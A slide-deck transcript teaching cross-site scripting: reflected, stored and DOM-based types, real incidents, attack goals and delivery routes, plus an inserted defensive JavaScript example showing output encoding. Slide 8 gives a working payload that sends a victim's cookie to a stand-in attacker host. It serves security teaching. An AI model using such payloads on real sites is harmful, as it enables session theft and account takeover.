
Chapter 12: Attacking Users: Cross-Site Scripting

Chapter 12: Attacking Users: Cross-Site Scripting. Presented By: Chandra Kollipara. Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted web sites.





Presentation Transcript


  1. Chapter 12: Attacking Users: Cross-Site Scripting Presented By: Chandra Kollipara

  2. Cross-Site Scripting: • Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted web sites. • Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user.

  3. “Users get compromised because they are not security-conscious” • “You can’t own a web application via XSS.”

  4. Types of XSS: • Reflected • Stored • DOM-based

  5. Reflected XSS: http://mdsec.net/error/5/Error.ashx?message=Sorry%2c+an+error+occurred

  6. http://mdsec.net/error/5/Error.ashx?message=<script>alert(1)</script>

  7. Exploiting the vulnerability

  8. http://mdsec.net/error/5/Error.ashx?message=<script>var+i=new+Image;+i.src="http://mdattacker.net/"%2bdocument.cookie;</script> • Decoded, the injected script is: var i=new Image; i.src="http://mdattacker.net/"+document.cookie;

  9. Q. Why doesn’t the attacker simply host a malicious script on mdattacker.net and feed the user a direct link to this script?
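The reflection on slides 5 through 8 and the stored case on slide 10 share one root cause and one fix: user-controlled data reaching an HTML sink without output encoding. The following is an added example, not code from the slides or from mdsec.net; the route and the `message` parameter come from the slide URL, while the function names and markup are constructed for illustration.

```javascript
// Added example, not from the slides or from mdsec.net: a minimal server-side
// render of the slide-5 error page, with the vulnerable reflection beside the
// encoded form. The route and the `message` parameter come from the slide URL;
// the function names and the markup are constructed for illustration.

// Vulnerable: the query parameter is copied into the HTML body unchanged, so
// <script>alert(1)</script> from slide 6 becomes live markup in the response.
function renderErrorVulnerable(message) {
  return `<p>Error: ${message}</p>`;
}

// HTML-entity encode the characters that can end an element body or a quoted
// attribute. Encoding at the point of output, for the HTML context the data
// lands in, is the fix for reflected XSS and for stored XSS alike, since the
// stored case reaches the same sink one request later.
function htmlEncode(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same template, output-encoded parameter.
function renderErrorSafe(message) {
  return `<p>Error: ${htmlEncode(message)}</p>`;
}

// Extract `message` as a browser-facing server would: "+" decodes to a space
// and %2c to a comma, matching the URL on slide 5.
function messageFromUrl(url) {
  return new URL(url).searchParams.get("message") ?? "";
}

// Regression check for a test suite: a script tag must never survive output
// encoding. (Checking the response is not a substitute for encoding; it is
// here so the two render paths can be compared.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed URLs, taken from slides 5 and 6.
const BENIGN_URL = "http://mdsec.net/error/5/Error.ashx?message=Sorry%2c+an+error+occurred";
const PAYLOAD_URL = "http://mdsec.net/error/5/Error.ashx?message=<script>alert(1)</script>";

function demo() {
  return {
    benign: renderErrorSafe(messageFromUrl(BENIGN_URL)),
    vulnerable: renderErrorVulnerable(messageFromUrl(PAYLOAD_URL)),
    safe: renderErrorSafe(messageFromUrl(PAYLOAD_URL)),
  };
}
```

Marking the session cookie HttpOnly additionally keeps document.cookie, which the slide-8 payload reads, from exposing the session token, although an injected script can still drive the application as the user from inside the browser.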

  10. Stored XSS Vulnerability: • Data submitted by one user is stored in the application (typically in a back-end database) and is later displayed to other users without being filtered or sanitized appropriately. It involves two requests: • The attacker posts some crafted data containing malicious code, which the application stores. • A victim views a page containing the attacker’s data, and the malicious code executes in the victim’s browser.

  11. DOM-based XSS Vulnerability: • DOM-based XSS vulnerabilities are more similar to reflected XSS bugs than to stored XSS bugs. • Their exploitation typically involves an attacker’s inducing a user to access a crafted URL containing malicious code. • The server’s response to that specific request contains client-side script that processes the URL, and that client-side processing causes the malicious code to be executed.

  12. XSS Attacks in Action: • In 2010, the Apache Foundation was compromised via a reflected XSS attack within its issue-tracking application. http://blogs.apache.org/infra/entry/apache_org_04_09_2010 • In 2005, the social networking site MySpace was found to be vulnerable to a stored XSS attack. http://namb.la/popular/tech.html • In 2009, Twitter fell victim to two XSS worms. www.cgisecurity.com/2009/04/two-xss-worms-slam-twitter.html http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-andsomething.html

  13. Payload for XSS Attacks: • Session hijacking: capturing a victim’s session token, hijacking her session, and thereby making use of the application “as” the victim, performing arbitrary actions and potentially taking ownership of that user’s account. • Virtual Defacement • Injecting Trojan Functionality • Inducing user actions

  14. Virtual Defacement

  15. Injecting Trojan functionality

  16. Delivery Mechanisms • In a targeted attack, a forged e-mail may be sent to a single target user or a small number of users. • A URL can be fed to a target user in an instant message. • Content and code on third-party websites can be used to generate requests that trigger XSS flaws. • Many web applications implement a function to “tell a friend” or send feedback to site administrators.

  17. For Stored XSS: • The two kinds of delivery mechanisms for stored XSS attacks are in-band and out-of-band. • In-band delivery applies in most cases and is used when the data that is the subject of the vulnerability is supplied to the application via its main web interface. • Out-of-band delivery applies in cases where the data that is the subject of the vulnerability is supplied to the application through some other channel.

  18. Thank You Questions?
